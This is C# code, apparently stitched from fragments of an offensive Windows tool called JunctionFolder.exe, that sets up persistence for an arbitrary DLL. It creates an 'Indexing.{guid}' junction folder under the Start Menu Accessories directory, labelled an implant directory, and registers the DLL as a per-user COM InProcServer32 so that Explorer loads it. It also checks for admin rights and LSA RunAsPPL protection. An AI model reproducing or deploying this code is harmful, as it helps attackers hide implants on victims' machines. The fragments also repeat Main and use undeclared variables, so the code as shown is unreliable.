public static void PreflightChecks(string dllPath)
{
WindowsIdentity identity = WindowsIdentity.GetCurrent();
WindowsPrincipal principal = new WindowsPrincipal(identity);
if (!principal.IsInRole(WindowsBuiltInRole.Administrator))
{
Console.WriteLine("[-] You do not have admin privileges. Exiting.");
return;
}
//Get OS arch
if (!string.IsNullOrEmpty(Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432")))
{
Console.WriteLine("[+] Detected x86 system architecture.");
osArch = "x86";
}
else
{
Console.WriteLine("[+] Detected x64 system architecture.");
osArch = "x64";
}
//Get DLL arch
MachineType type = GetDllMachineType(dllPath);
string dllArch = null;
if (type.Equals(MachineType.IMAGE_FILE_MACHINE_I386))
{
Console.WriteLine("[+] Detected DLL x86 DLL architecture");
dllArch = "x86";
}
else if (type.Equals(MachineType.IMAGE_FILE_MACHINE_IA64) || type.Equals(MachineType.IMAGE_FILE_MACHINE_AMD64))
{
Console.WriteLine("[+] Detected DLL x64 DLL architecture");
dllArch = "x64";
}
//Check for architecture match
if (!dllArch.Equals(osArch))
{
Console.WriteLine("[-] Detected architecture mismatch. Make sure your DLL architecture matches the host's.");
}
RegistryKey runAsPPL = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\RunAsPPL");
string runAsPPLVal = Convert.ToString(runAsPPL);
if (String.IsNullOrEmpty(runAsPPLVal))
{
Console.WriteLine("[+] RunAsPPL registry key not set!");
}
else
{
Console.WriteLine("[-] RunAsPPL registry key set. Exiting...");
return;
}
}
static void Main(string[] args)
{
MachineType type = GetDllMachineType("path/to/MyAssembly.dll");
if (type.Equals(MachineType.IMAGE_FILE_MACHINE_I386))
{
Console.WriteLine("Dll architecture: x86/32bit");
}
else if (type.Equals(MachineType.IMAGE_FILE_MACHINE_IA64))
{
Console.WriteLine("Dll architecture: x64/64bit");
}
Console.ReadKey();
}
public static string getArch(string path)
{
MachineType dlltype = GetDllMachineType(path);
if (dlltype.Equals(MachineType.IMAGE_FILE_MACHINE_I386))
{
Console.WriteLine("Dll architecture: x86/32bit");
arch = "x86";
}
else if (dlltype.Equals(MachineType.IMAGE_FILE_MACHINE_AMD64))
{
Console.WriteLine("Dll architecture: x64/64bit");
arch = "x64";
}
return(arch);
}
static void Main(string[] args)
{
//string b64Dll = "TVqQ...";
//byte[] dllBytes = Convert.FromBase64String(b64Dll);
//File.WriteAllBytes(@"C:\temp\mydll.dll",)
if (args.Length != 1)
{
Console.WriteLine("[-] Usage: JunctionFolder.exe <full path to DLL>");
Environment.Exit(1);
}
if (!File.Exists(args[0]))
{
Console.WriteLine("[-] DLL does not appear to exist on the system. Did you provide the full path?");
Environment.Exit(1);
}
if (!string.IsNullOrEmpty(Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432")))
{
Console.WriteLine("[+] Detected x86 system architecture.");
osArch = "x86";
}
else
{
Console.WriteLine("[+] Detected x64 system architecture.");
osArch = "x64";
}
MachineType type = GetDllMachineType(args[0]);
string dllArch = null;
if (type.Equals(MachineType.IMAGE_FILE_MACHINE_I386))
{
Console.WriteLine("[+] Detected DLL x86 DLL architecture");
dllArch = "x86";
}
else if (type.Equals(MachineType.IMAGE_FILE_MACHINE_IA64) || type.Equals(MachineType.IMAGE_FILE_MACHINE_AMD64))
{
Console.WriteLine("[+] Detected DLL x64 DLL architecture");
dllArch = "x64";
}
if (!dllArch.Equals(osArch))
{
Console.WriteLine("[-] Detected architecture mismatch. Make sure your DLL architecture matches the host's.");
Environment.Exit(1);
}
//Create the junction folder
string implantDir = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), @"Microsoft\Windows\Start Menu\Programs\Accessories\");
string target = implantDir + "Indexing." + guid;
try
{
Directory.CreateDirectory(target);
}
catch (Exception e)
{
Console.WriteLine("[-] Unable to create the junction folder");
Console.WriteLine(e);
Environment.Exit(1);
}
Console.WriteLine("[+] Created junction folder at %APPDATA%/Indexing." + guid);
//Set up the registry key
string dllPath = args[0];
string key = @"SOFTWARE\Classes\CLSID\" + guid + @"\InProcServer32";
RegistryKey regkey = Registry.CurrentUser.CreateSubKey(key);
try
{
regkey.SetValue("", dllPath);
regkey.Close();
}
catch (Exception e)
{
Console.WriteLine("[-] Could not write the registry key");
Console.WriteLine(e);
Environment.Exit(1);
}
Console.WriteLine("[+] Registry key written");
}